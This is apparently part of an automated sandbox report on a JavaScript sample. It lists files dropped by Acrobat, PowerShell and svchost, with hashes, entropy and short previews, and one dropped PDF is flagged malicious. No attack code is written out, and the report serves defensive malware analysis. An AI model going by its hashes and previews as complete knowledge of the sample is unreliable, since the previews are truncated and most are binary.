                      SHA-512:688F931FA5D43E7C69FD276FD999CF73BF75F00A5E61F707F25EFDDB6B288DCFCBE931D908D17FC173B97CF51AF00FEF58A7677B2B9D1C467347A3F7F031ED24
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):282
                      Entropy (8bit):5.211514913171498
                      Encrypted:false
                      SSDEEP:6:YEQXJ2HX9VTDIR0BKWY+FIbRI6XVW7+0YpVUKoAvJTqgFCrPeUkwRe9:YvXKXDDI+KW5YpW76VeGTq16Ukee9
                      MD5:B1D68A7E6C00DE6D8574E6FE3AD18364
                      SHA1:D510953E39B6E7D70C5AFE814CCF35E3EB41AC99
                      SHA-256:2273E542BA1DFA6576BCF1A112E70D304AB72A3C3E177276E4E25BE0F7CA3560
                      SHA-512:40F558AF1AAAC69FB3FEC30331723550C59F24B196013C61C695B4D0A452D51593CC009794A2604DC04522ABFCB9040121144F246A1C6EC95016B7A8205745A9
                      Malicious:false
                      Preview:{"analyticsData":{"responseGUID":"ae303b0d-1b3a-4644-8504-bc700a643eb0","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1737104086159,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4
                      Entropy (8bit):0.8112781244591328
                      Encrypted:false
                      SSDEEP:3:e:e
                      MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                      SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                      SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                      SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                      Malicious:false
                      Preview:....
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):2814
                      Entropy (8bit):5.144906687109705
                      Encrypted:false
                      SSDEEP:24:Y2z/a3/HayzBZTBLqE8q/0dhjZB8Pj0SfVCL2om3/2LSRCZMDsavxH+M5w99lunj:Y2alVqRZB8bCDm3//KMDsavxdq99y
                      MD5:55D71F527870401165F96BFFD3FA669E
                      SHA1:0C790E6E4D5039416DC4F1AB7A193842671C9200
                      SHA-256:7F4463B4560C03FAA9A6FF2A25E1F2DE420E128B0527AB16F38456184016B8BD
                      SHA-512:47E0739D15877CD73F32B364D39922DB711DC05393196E727E154CA0569638386508FCD928E6FE91785502E99E728E3BCA7412C0706A9F6B5CFEB6788B079513
                      Malicious:false
                      Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"3e5eb4dac162f4a158659ab543648fc2","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736925195000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"707ef574b4f6d0740cf0419385a4e8ab","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736925195000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"caffc7ac03acc37af812ca6ab07d6ee2","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736925195000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"0b44359ea7a42ec5189f3289994e079f","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736925195000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"a946d63f6eb3da1012b7e5cd5f87a83f","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736925195000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"2344bd7cdcfb1868123430bccc0b4cd7","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                      Category:dropped
                      Size (bytes):12288
                      Entropy (8bit):0.9855119401347064
                      Encrypted:false
                      SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SpxNkKn4zJwtNBwtNbRZ6bRZ4gNkKnF:TVl2GL7ms6ggOVpTkK4zutYtp6PxkKF
                      MD5:44EC5C06C10E448D65E4550056DA16D2
                      SHA1:F11BDE74D91BB89B157FFC7CCE60971004E149B5
                      SHA-256:8A6E573978C7EA43BFEA50C5FDA1658E43893691C73F4B85F6B821669A891523
                      SHA-512:5CC72C802CE15A22697FCBA25EB84F1449F0928A2E3847CDBEF30A66F40629114FA2377518E671B9F72A1E6A65C203EE643547625CB05E1C29D077A57A51A608
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:SQLite Rollback Journal
                      Category:dropped
                      Size (bytes):8720
                      Entropy (8bit):1.3399520541891974
                      Encrypted:false
                      SSDEEP:24:7+trAD1RZKHs/Ds/SpxNkKnPzJwtNBwtNbRZ6bRZWf1RZKeqLBx/XYKQvGJF7urP:7MrGgOVpTkKPzutYtp6PMTqll2GL7ms2
                      MD5:E172BAD1ECDDF90E48F5A806689BB27F
                      SHA1:28E2FFDA42D0E825D248A61719E4A0C5B39A690B
                      SHA-256:ACAE3C7836997BAD86228DC9AB073D5B2EDB2B184B518F67FF46CB309A5C2094
                      SHA-512:8BCD34B54E204EB98EC92297FDAA2DAAD2F04D0949B3589BC52D8DF751B02CC2393DBAE3E656F930545AE891CDC86704F0C851B2A69B6C88000DC7B5391D96D3
                      Malicious:false
                      Preview:.... .c.......Q.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):66726
                      Entropy (8bit):5.392739213842091
                      Encrypted:false
                      SSDEEP:768:RNOpblrU6TBH44ADKZEgZCR683tGedFeVy1WQVqTFgswY9Yyu:6a6TZ44ADEZCRvtGewy18X9K
                      MD5:CB2E2B1BE7F6903EFFF6A04EEE47D706
                      SHA1:6DDDB55C74047347E8B2A0C09BC68E0A5AC0BC57
                      SHA-256:CE19C516C5436BE97C7C5421FC5603EABF8D78B56460ABD57ACB5498A8B4E0BB
                      SHA-512:6B9C1AFD4DCF6CEB6CCAF6383B78C61E75AB3F3B112E2DA1B26DD0405B4A2E2D62A5CD16946FC44A88684674EC5A7705B7700C84B02B9F4C36095B7831B712EA
                      Malicious:false
                      Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:Nlllul/nq/llh:NllUyt
                      MD5:AB80AD9A08E5B16132325DF5584B2CBE
                      SHA1:F7411B7A5826EE6B139EBF40A7BEE999320EF923
                      SHA-256:5FBE5D71CECADD2A3D66721019E68DD78C755AA39991A629AE81C77B531733A4
                      SHA-512:9DE2FB33C0EA36E1E174850AD894659D6B842CD624C1A543B2D391C8EBC74719F47FA88D0C4493EA820611260364C979C9CDF16AF1C517132332423CA0CB7654
                      Malicious:false
                      Preview:@...e................................................@..........
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):246
                      Entropy (8bit):3.5004142083842487
                      Encrypted:false
                      SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8+pClEl4:Qw946cPbiOxDlbYnuRKZB4
                      MD5:DA530B0FB8D17DE09573FBF631019038
                      SHA1:33E5881B36EDAFACC9223B963AF0A89C624721F5
                      SHA-256:4B5FA4E22D59E1ADE2E648C1353F086AE78D8702AB264D92A33796EF1783B30F
                      SHA-512:EE05C29BE5D7C40A3F389DD0DBC1194F58CFC33CD8985607FE5F0A52550BCFC83C7E422B767A6CDDCA2EC5503ED38F8FCA4F14E89B2998CF1995D099C316628D
                      Malicious:false
                      Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .1.5./.0.1./.2.0.2.5. . .0.2.:.1.3.:.1.7. .=.=.=.....
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with very long lines (393)
                      Category:dropped
                      Size (bytes):16525
                      Entropy (8bit):5.376360055978702
                      Encrypted:false
                      SSDEEP:384:6b1sdmfenwop+WP21h2RPjRNg7JjO2on6oU6CyuJw1oaNIIu9EMuJuF6MKK9g9JQ:vIn
                      MD5:1336667A75083BF81E2632FABAA88B67
                      SHA1:46E40800B27D95DAED0DBB830E0D0BA85C031D40
                      SHA-256:F81B7C83E0B979F04D3763B4F88CD05BC8FBB2F441EBFAB75826793B869F75D1
                      SHA-512:D039D8650CF7B149799D42C7415CBF94D4A0A4BF389B615EF7D1B427BC51727D3441AA37D8C178E7E7E89D69C95666EB14C31B56CDFBD3937E4581A31A69081A
                      Malicious:false
                      Preview:SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:961+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=03c9683a-b9c7-43c5-80d5-ee4bbf74fb26.1696428955961 Timestamp=2023-10-04T16:15:55:962+0200 ThreadID=6596 Component=ngl-lib_NglAppLib Description="SetConfig:
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with very long lines (393), with CRLF line terminators
                      Category:dropped
                      Size (bytes):15114
                      Entropy (8bit):5.36454656786958
                      Encrypted:false
                      SSDEEP:384:dyWBuQcHP02FRQ2FylMuJ/gR3wvx1efTuVwVgV/js8+QoeyjvM7YKi9HCEpHWHqZ:iLFRfFguq+
                      MD5:E0374F36FBA551277389360D67FBAF43
                      SHA1:1FED157C13FBD3E379800F136C534D02515352A5
                      SHA-256:BB492E1519691B0E772D049A91F78753859C5DAD88D42E5C8640D3D9501BA3A2
                      SHA-512:EF23F0327194ECE6F33C19B1C45830283966D623CA760A43C50DF928B8C91A45DFFCE43B580AD6BF809810679BD8571FD6DC08398A4872F1AE60ADC5069A80D6
                      Malicious:false
                      Preview:SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:133-0500 ThreadID=7904 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:135-0500 ThreadID=7904 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:137-0500 ThreadID=7904 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:137-0500 ThreadID=7904 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=3258066b-9620-4b05-81f8-67b8770f7d66.1736925192133 Timestamp=2025-01-15T02:13:12:137-0500 ThreadID=7904 Component=ngl-lib_NglAppLib Description="SetConf
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:dropped
                      Size (bytes):29752
                      Entropy (8bit):5.39433482455567
                      Encrypted:false
                      SSDEEP:768:GLxxlyVUFcAzWL8VWL1ANSFld5YjMWLvJ8Uy++NSXl3WLd5WLrbhhVClkVMwDGbE:Q
                      MD5:E9B5BD0BB924265203C478489B60FA2C
                      SHA1:2D39998EF390A7A29F0D6B4D5617618203FF4EBA
                      SHA-256:2CAC6E8E81ED95C361AF351A5F8E984B452FE66864DCEDD6F467286A9E374E19
                      SHA-512:874B222C2CAD40AB72CD4C3D76B23F65BCEF3AAC1A206ECD08EE06D84B9BF120590D59B91DE43892325C874F538BBDFED96A933059E05FDC6294F52D31390A25
                      Malicious:false
                      Preview:04-10-2023 02:39:31:.---2---..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ***************************************..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Starting NGL..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..04-10-2023 02:39:31:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..04-10-2023 02:39:31:.Closing File..04-10-
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                      Category:dropped
                      Size (bytes):758601
                      Entropy (8bit):7.98639316555857
                      Encrypted:false
                      SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                      MD5:3A49135134665364308390AC398006F1
                      SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                      SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                      SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                      Malicious:false
                      Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                      Category:dropped
                      Size (bytes):1407294
                      Entropy (8bit):7.97605879016224
                      Encrypted:false
                      SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
                      MD5:A0CFC77914D9BFBDD8BC1B1154A7B364
                      SHA1:54962BFDF3797C95DC2A4C8B29E873743811AD30
                      SHA-256:81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
                      SHA-512:74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
                      Malicious:false
                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                      Category:dropped
                      Size (bytes):386528
                      Entropy (8bit):7.9736851559892425
                      Encrypted:false
                      SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                      MD5:5C48B0AD2FEF800949466AE872E1F1E2
                      SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                      SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                      SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                      Malicious:false
                      Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                      File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                      Category:dropped
                      Size (bytes):1419751
                      Entropy (8bit):7.976496077007677
                      Encrypted:false
                      SSDEEP:24576:/M7oMOWLaGZ4ZwYIGNP8dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:RVWLaGZ4ZwZGm3mlind9i4ufFXpAXkru
                      MD5:E787F9888A1628BE8234F19E8EE26D68
                      SHA1:44D5180C06ADBBDAADDBCE350CE4DEC997CD83E5
                      SHA-256:3A09F3799148DA49F039A35AEDD22F368FB35B8D6022C4691C10606F704DAF80
                      SHA-512:EE9B602898706CC0F33AA570E29A79A58ED748E1B738D74DF0C8C8DF193E23421B47AC8C862623ED774289D94FA90662A4CC436B80479D6420433D81752E9CA9
                      Malicious:false
                      Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:PDF document, version 1.7
                      Category:dropped
                      Size (bytes):635764
                      Entropy (8bit):7.929592005409041
                      Encrypted:false
                      SSDEEP:12288:+ZLfaHa9wphzjERQ/JTckor+EURE+AwAX75pfGJKsKca+e7lEjYQ:+ZyjgQRRor+lRJAwAXlpoKgQ76jYQ
                      MD5:91A2AF9E2A61ABF7D9977999FBF9879E
                      SHA1:F6E4FA02DD15B27F74553FB1B220A4D2DF385267
                      SHA-256:FC3518D746CDB3738DA976551795B9727619F41F89AC0641533126E2F69B969A
                      SHA-512:8B27CC0E0E902ABB59735FF4FC67789C0F0F9A1BF3F619A7AFAEAAA13A9AFCF9C82F25596719A65EC15221EBAE16EF9701CDB48F372BBF1BE08CB568DBE41D7C
                      Malicious:true
                      Preview:%PDF-1.7.%.....1 0 obj.<< /Pages 3 0 R /Type /Catalog >>.endobj.2 0 obj.<< /Type /ObjStm /Length 56 /Filter /FlateDecode /N 1 /First 4 >>.stream.x.3V0.Q.w./.+Q0T...L)V.V0Q0P.R.U...,HU..HLO-V.....%0.mendstream.endobj.4 0 obj.<< /Contents 5 0 R /Group << /CS /DeviceRGB /I true /S /Transparency /Type /Group >> /MediaBox [ 0 0 594.96 840.96 ] /Parent 3 0 R /Resources 6 0 R /StructParents 0 /Type /Page >>.endobj.5 0 obj.<< /Filter /FlateDecode /Length 75 >>.stream.x.3T0.B]C aab.gi....U.e...E........\ E..&@yC.:.l.B.W.B!P9D..~...K>W ...&...endstream.endobj.6 0 obj.<< /ExtGState << /a0 << /CA 1 /ca 1 >> >> /XObject << /x7 7 0 R >> >>.endobj.7 0 obj.<< /BBox [ 0 0 595 841 ] /Filter /FlateDecode /Resources 8 0 R /Subtype /Form /Type /XObject /Length 59 >>.stream.x.+..T(..O/6PH/.*.2.4.4S0.B]......H...O..S.04Tp....B.....endstream.endobj.8 0 obj.<< /ExtGState << /a0 << /CA 1 /ca 1 >> /gs0 << /BM /Normal /CA 1.0 /SMask /None /ca 1.0 >> >> /XObject << /x11 9 0 R >> >>.endobj.9 0 obj.<< /BitsPerCo
                      Process:C:\Windows\System32\svchost.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):55
                      Entropy (8bit):4.306461250274409
                      Encrypted:false
                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                      Malicious:false
                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                      File type:ASCII text, with very long lines (37121), with CRLF line terminators
                      Entropy (8bit):4.9154056290578145
                      TrID:
                        File name:1475127682155276.js
                        File size:37'155 bytes
                        MD5:453599a731336818e0b53408cc447545
                        SHA1:f887fc09c17d9b2fc6e1a9306017c31c5bcc7d72
